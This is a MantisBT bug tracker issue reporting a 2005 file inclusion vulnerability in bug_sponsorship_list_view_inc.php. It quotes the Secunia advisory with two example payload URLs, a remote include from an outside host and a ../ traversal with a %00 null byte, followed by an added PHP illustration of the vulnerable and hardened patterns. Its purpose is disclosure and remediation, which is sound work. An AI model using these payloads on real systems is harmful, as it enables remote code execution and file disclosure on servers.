View Issue Details

ID: 0006273
Project: mantisbt
Category: security
View Status: public
Last Update: 2006-10-09 11:55
Reporter: vboctor
Assigned To: vboctor
Priority: normal
Severity: minor
Reproducibility: always
Status: closed
Resolution: fixed
Product Version: 1.0.0rc2
Fixed in Version: 1.0.0rc3
Summary: 0006273: File Inclusion Vulnerability
Description

Andreas Sandblad, Secunia Research has discovered a vulnerability in Mantis, which can be exploited by malicious people to compromise a vulnerable system.

Input passed to the "t_core_path" parameter in "bug_sponsorship_list_view_inc.php" isn't properly verified before it is used to include files. This can be exploited to include arbitrary files from external and local resources.

We have assigned the vulnerability Secunia Advisory SA16818 and have put a preliminary release date on our advisory for 12 October 2005, 1PM CET.
Please inform us when you would expect to issue a patch or updated version.

Examples:
http://[host]/mantis-1.0.0rc2/bug_sponsorship_list_view_inc.php?t_core_path=http://[host]/[file].php?
http://[host]/mantis-1.0.0rc2/bug_sponsorship_list_view_inc.php?t_core_path=../../../../../../../[file]%00

Successful exploitation requires that "register_globals" is enabled (not a recommended setting).

The vulnerability has been confirmed in version 1.0.0rc2. Other versions may also be affected.
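As an added illustration (this is not MantisBT's own code and not part of the Secunia advisory), the block below reproduces the kind of include the advisory describes and puts a hardened form beside it: refuse to run when register_globals is on, stop the include file from being requested directly, compute the include directory from the script's own location instead of a variable, and, for code that still has to accept a path from configuration, canonicalise and confine it so that both payloads quoted above are rejected. The names are assumptions: that the include file loads "sponsorship_api.php" from a directory held in $t_core_path, that this directory is "core/" beside the file, and the guard-constant name BUG_SPONSORSHIP_LIST_VIEW_INC_ALLOW.

```php
<?php
/*
 * Added illustration, not MantisBT's code. Assumed layout (not from the page):
 * this file is bug_sponsorship_list_view_inc.php, it needs sponsorship_api.php
 * from a directory held in $t_core_path, and that directory is "core/" next to it.
 */

/* ---- Vulnerable pattern (illustrative) ----------------------------------
 * The include file trusts the page that includes it to have set $t_core_path.
 * With register_globals=On, PHP pre-populates $t_core_path from the query
 * string before the file runs, so a request such as
 *   ?t_core_path=http://[host]/[file].php?       (remote file; needs allow_url_fopen,
 *                                                  later allow_url_include, on)
 *   ?t_core_path=../../../../../../../[file]%00  (local file; the NUL byte cut off
 *                                                  the appended name in PHP of the era)
 * controls what this line loads:
 *
 *   require_once( $t_core_path . 'sponsorship_api.php' );
 */

/* ---- Hardened pattern -------------------------------------------------- */

/* 1. Refuse to run under the setting exploitation requires. ini_get() returns
 *    "1" when the directive is on, "" or "0" when off (both falsy), and false
 *    on PHP >= 5.4 where the directive no longer exists. */
if ( ini_get( 'register_globals' ) ) {
    die( 'register_globals is enabled; refusing to run. Set register_globals = Off in php.ini.' );
}

/* 2. Only a page that defines the guard constant may load this file, so the
 *    .inc file cannot be requested on its own. The including page would do:
 *      define( 'BUG_SPONSORSHIP_LIST_VIEW_INC_ALLOW', true );
 *      require_once( 'bug_sponsorship_list_view_inc.php' );
 */
if ( !defined( 'BUG_SPONSORSHIP_LIST_VIEW_INC_ALLOW' ) ) {
    die( 'This file may only be included from a page, not requested directly.' );
}

/* 3. Derive the include directory from this file's own location. It is now
 *    assigned here, server-side, so nothing in the request can set it. */
$t_core_path = dirname( __FILE__ ) . DIRECTORY_SEPARATOR . 'core' . DIRECTORY_SEPARATOR;

/* 4. Defence in depth for code that must accept a directory from configuration:
 *    return its canonical form (with trailing separator) only if it really lies
 *    under $p_base, otherwise false. Both advisory payloads fail here: the URL
 *    form matches the scheme check, and the traversal form carries a NUL byte
 *    (and, without it, would resolve outside the base). The NUL check comes
 *    first because realpath() rejects such strings with a warning (PHP >= 5.3.4)
 *    or a ValueError (PHP 8). */
function confine_to_base( $p_candidate, $p_base ) {
    if ( strpos( $p_candidate, "\0" ) !== false ) {                 /* %00 payload */
        return false;
    }
    if ( preg_match( '#^[a-z][a-z0-9+.-]*://#i', $p_candidate ) ) { /* http://, ftp://, ... */
        return false;
    }
    $t_base = realpath( $p_base );
    $t_real = realpath( $p_candidate );                              /* false if absent */
    if ( $t_base === false || $t_real === false || !is_dir( $t_real ) ) {
        return false;
    }
    /* Compare with trailing separators so "/app/core2" does not pass as "/app/core". */
    $t_base = rtrim( $t_base, DIRECTORY_SEPARATOR ) . DIRECTORY_SEPARATOR;
    $t_real = rtrim( $t_real, DIRECTORY_SEPARATOR ) . DIRECTORY_SEPARATOR;
    if ( strncmp( $t_real, $t_base, strlen( $t_base ) ) !== 0 ) {   /* escaped the base */
        return false;
    }
    return $t_real;
}

$t_core_path = confine_to_base( $t_core_path, dirname( __FILE__ ) );
if ( $t_core_path === false ) {
    die( 'core path is missing or lies outside the application directory' );
}
require_once( $t_core_path . 'sponsorship_api.php' );
```

Step 3 is the actual fix: once the path is a constant computed by the script, there is no parameter left for register_globals to populate. Steps 1 and 2 are the checks a page should make before any include runs, and step 4 only matters where an include directory is genuinely configurable.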

Tags: No tags attached.

Activities

ryandesign (reporter), 2005-09-20 11:05, ~0011403

0005956:0010823 says we want to treat register_globals==ON as a fatal error, with which I couldn't agree more. Is that not in 1.0.0rc1 or 1.0.0rc2? 0005956:0010823 suggests it would be, but the existence of 0006273 implies that it is not.

Or are we perhaps only checking for register_globals==OFF in the setup scripts, and not at the top of every page as we would need to?

vboctor (manager), 2005-10-28 19:57, ~0011560

bug_sponsorship_list_view_inc.php -> 1.12.4.1